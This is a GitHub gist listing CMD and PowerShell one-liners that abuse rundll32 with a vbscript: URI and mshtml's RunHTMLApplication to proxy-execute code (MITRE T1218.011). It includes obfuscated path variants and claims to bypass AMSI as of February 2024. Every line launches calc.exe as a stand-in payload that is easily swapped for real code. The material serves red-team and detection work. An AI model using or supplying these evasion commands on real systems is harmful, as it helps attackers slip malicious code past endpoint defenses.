Created
February 25, 2024 00:37
-
-
Save bobby-tablez/260bc568785120fe8ec3a4ee0a222335 to your computer and use it in GitHub Desktop.
Proxy Execution Using Rundll32.exe Vbscript
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# A list of CMD/PowerShell scripts which leverage the T1218.011 proxy execution technique. Currently bypasses AMSI as of 02/2024. | |
# CMD | |
rundll32 vbscript:"\\..\\mshtml\\..\\fishsticks\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0) | |
rundll32 vbscript:"\\\\..\\\\mshtml\\\\..\\\\mshtml\\\\..\\\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0) | |
rundll32 vbscript:"/\/\../\/\mshtml/\/\../\/\mshtml/\/\../\/\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0) | |
rundll32 vbscript:"\\....\\mshtm\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0) | |
rundll32 vbscript:"\\..../\/\fishsticks\\..\\../\/\mshtml/\/\..\\../\/\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0) | |
# PowerShell | |
Start-Process cmd.exe -ArgumentList '/c', 'rundll32 vbscript:"\\..\\mshtml\\..\\fishsticks\\..\\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("calc.exe"),0)' | |
Invoke-Expression -Command "cmd.exe /c rundll32 vbscript:`"\\..\\mshtml\\..\\fishsticks\\..\\mshtml,RunHTMLApplication `"+String(CreateObject(`"WScript.Shell`").Run(`"calc.exe`"),0)" | |
Start-Job -ScriptBlock { Start-Process "rundll32.exe" -ArgumentList 'vbscript:"\\..\\mshtml\\..\\fishsticks\\..\\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("calc.exe"),0)' } | |
Set-ExecutionPolicy Bypass -Scope Process; & cmd /c 'rundll32 vbscript:"\\..\\mshtml\\..\\fishsticks\\..\\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("calc.exe"),0)' | |
$scriptBlock = {cmd.exe /c rundll32 vbscript:"\\..\\mshtml\\..\\fishsticks\\..\\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("calc.exe"),0)};Invoke-Command -ScriptBlock $scriptBlock -ComputerName $env:computername | |
Invoke-WmiMethod -Path Win32_Process -Name Create -ArgumentList "rundll32.exe vbscript:`"\\..\\mshtml\\..\\fishsticks\\..\\mshtml,RunHTMLApplication `",`"String(CreateObject(`"WScript.Shell`").Run(`"calc.exe`"),0)`"" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment